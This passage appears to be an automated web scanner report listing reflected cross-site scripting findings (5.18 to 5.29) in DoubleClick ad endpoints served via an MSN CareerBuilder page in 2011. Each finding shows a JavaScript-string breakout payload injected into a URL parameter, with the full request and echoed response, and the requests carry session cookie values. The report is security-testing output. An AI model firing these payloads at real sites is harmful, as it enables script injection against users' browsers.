Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
gitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093370/41111157/2%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.18. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90776"-alert(1)-"bf4f4a050a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37424

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/d9/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093361/41111148/2
...[SNIP]...

5.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2b0c"-alert(1)-"b64a598cf19 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/j%3B238055452%3B0-0%3B0%3B60965164%3B4307-300/250%3B41
...[SNIP]...

5.20. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edbfd"-alert(1)-"dcc08de5e14 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37427
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:43:09 GMT
Expires: Tue, 26 Apr 2011 18:43:09 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
oughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/j%3B238055452%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093366/41111153/2%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.21. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 522ce"-alert(1)-"6f4be5c894c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
")
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%
...[SNIP]...

5.22. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97dd"-alert(1)-"9bf7dd8f0c5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
lip_Banner_White_NewLogo_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/9
...[SNIP]...

5.23. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80e"-alert(1)-"f1d880c1fb0 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...

var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/90%3B35405287/35423105/2%3B%3B%7Esscs%
...[SNIP]...

5.24. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2378f"-alert(1)-"aca77ed0aea was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:42:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8149

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
0" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb2378f"-alert(1)-"aca77ed0aea&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/r%3B232789996%3B4-0%3B0%3B56669790%3B3454-728/90%3B39235519/39253306/1%3B%3B%7Esscs%3D%3fhttp://aptm.phoenix.edu/?creative_desc=20dr
...[SNIP]...

5.25. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af92a"-alert(1)-"cc3235c4e7d was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8177

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
= 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9ACaf92a"-alert(1)-"cc3235c4e7d&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/b%3B232789996%3B0-0%3B0%3B56669790%3B3454-728/90%3B34684340/34702218/2%3B%3B%7Esscs%3D%3fhttp:
...[SNIP]...

5.26. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225ef"-alert(1)-"0238af59b08 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353225ef"-alert(1)-"0238af59b08&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/90%3B35405287/35423105/2%
...[SNIP]...

5.27. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7913a"-alert(1)-"5a80d9941ef was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8139

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
20DR_Button_Orange_728x90.gif";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G7913a"-alert(1)-"5a80d9941ef&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38
...[SNIP]...

5.28. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1989"-alert(1)-"427b3fe4f34 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8139
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:42:30 GMT
Expires: Tue, 26 Apr 2011 18:42:30 GMT

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=d1989"-alert(1)-"427b3fe4f34http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B%7Esscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_O
...[SNIP]...

5.29. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

